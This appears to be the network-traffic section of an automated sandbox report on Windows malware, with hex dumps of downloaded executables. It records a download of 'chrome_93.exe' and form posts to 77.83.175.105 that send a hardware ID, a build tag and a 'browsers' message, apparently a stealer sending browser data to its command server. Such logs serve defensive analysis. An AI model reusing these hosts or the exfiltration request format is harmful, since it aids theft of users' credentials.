00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 21:02:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 21:02:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 21:02:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 21:02:40 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 21:02:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 21:02:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: GET /chrome_93.exe HTTP/1.1Host: campuspersever.esCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 77.83.175.105Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIIEHJKKECGCBFIIJDAHost: 77.83.175.105Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 36 36 34 38 34 35 38 34 32 37 37 31 37 35 38 31 38 38 36 38 37 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 41 2d 2d 0d 0a Data Ascii: ------FHIIEHJKKECGCBFIIJDAContent-Disposition: form-data; name="hwid"A664845842771758188687------FHIIEHJKKECGCBFIIJDAContent-Disposition: form-data; name="build"LogsDiller------FHIIEHJKKECGCBFIIJDA--
                      Source: global trafficHTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAKHost: 77.83.175.105Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 2d 2d 0d 0a Data Ascii: ------HDAAAAFIIJDBGDGCGDAKContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------HDAAAAFIIJDBGDGCGDAKContent-Disposition: form-data; name="message"browsers------HDAAAAFIIJDBGDGCGDAK--
